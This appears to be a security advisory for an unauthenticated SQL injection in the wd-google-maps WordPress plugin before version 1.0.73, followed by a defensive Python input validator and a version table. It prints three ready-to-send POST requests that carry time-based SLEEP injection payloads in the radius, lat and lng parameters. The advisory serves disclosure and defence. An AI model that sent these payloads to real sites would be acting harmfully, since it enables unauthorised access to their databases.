The plugin does not properly sanitise and escape some parameters before using them in an SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.
Note: /2022/12/29/map/ is the page/post where Google_Maps_WD is embedded.

```
POST /2022/12/29/map/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 85

radius=1+and+(SELECT+7741+FROM+(SELECT(SLEEP(5)))hlAf)&lat=0.0&lng=0.0&distance_in=km
```

```
POST /2022/12/29/map/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 171

radius=1&lat=0.0))))+AS+distance+FROM+wp_gmwd_markers+as+T_MARKERS+where+T_MARKERS.published=1+and+(SELECT+7741+FROM+(SELECT(SLEEP(5)))hlAf)--+)&lng=0.0&distance_in=km
```

```
POST /2022/12/29/map/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 171

radius=1&lat=0.0&lng=0.0))))+AS+distance+FROM+wp_gmwd_markers+as+T_MARKERS+where+T_MARKERS.published=1+and+(SELECT+7741+FROM+(SELECT(SLEEP(5)))hlAf)--+)&distance_in=km
```
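A strict server-side check for the four parameters seen in the requests above, as an added example (not the plugin's code or its fix). The function name, the numeric ranges and the unit allowlist are assumptions; such a check could back a request filter or a log review for sites still running an affected version.

```python
import re
from urllib.parse import parse_qsl

# Parameter names come from the requests above. The ranges and the unit
# allowlist are assumptions for this example, not the plugin's own rules.
NUMERIC_RANGES = {"radius": (0.0, 50000.0), "lat": (-90.0, 90.0), "lng": (-180.0, 180.0)}
ALLOWED_UNITS = {"km", "mile"}
# ASCII digits only: no exponents, signs other than a leading minus, or spaces.
PLAIN_DECIMAL = re.compile(r"-?[0-9]{1,6}(?:\.[0-9]{1,12})?")


def rejected_params(body: str) -> list[str]:
    """Return the parameters in a form body that fail strict validation."""
    rejected = []
    # Walk every pair so a repeated parameter cannot hide a bad value.
    for name, raw in parse_qsl(body, keep_blank_values=True):
        if name in NUMERIC_RANGES:
            low, high = NUMERIC_RANGES[name]
            ok = bool(PLAIN_DECIMAL.fullmatch(raw)) and low <= float(raw) <= high
        elif name == "distance_in":
            ok = raw in ALLOWED_UNITS
        else:
            continue
        if not ok and name not in rejected:
            rejected.append(name)
    return rejected


# A constructed benign body, then the first request body shown above.
SAMPLES = [
    "radius=25&lat=51.5&lng=-0.12&distance_in=km",
    "radius=1+and+(SELECT+7741+FROM+(SELECT(SLEEP(5)))hlAf)&lat=0.0&lng=0.0&distance_in=km",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(rejected_params(sample) or "accepted")
```

Validation of this kind complements binding the values as typed query parameters; it does not replace it.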
CPE

Name | Operator | Version |
---|---|---|
wd-google-maps | lt | 1.0.73 |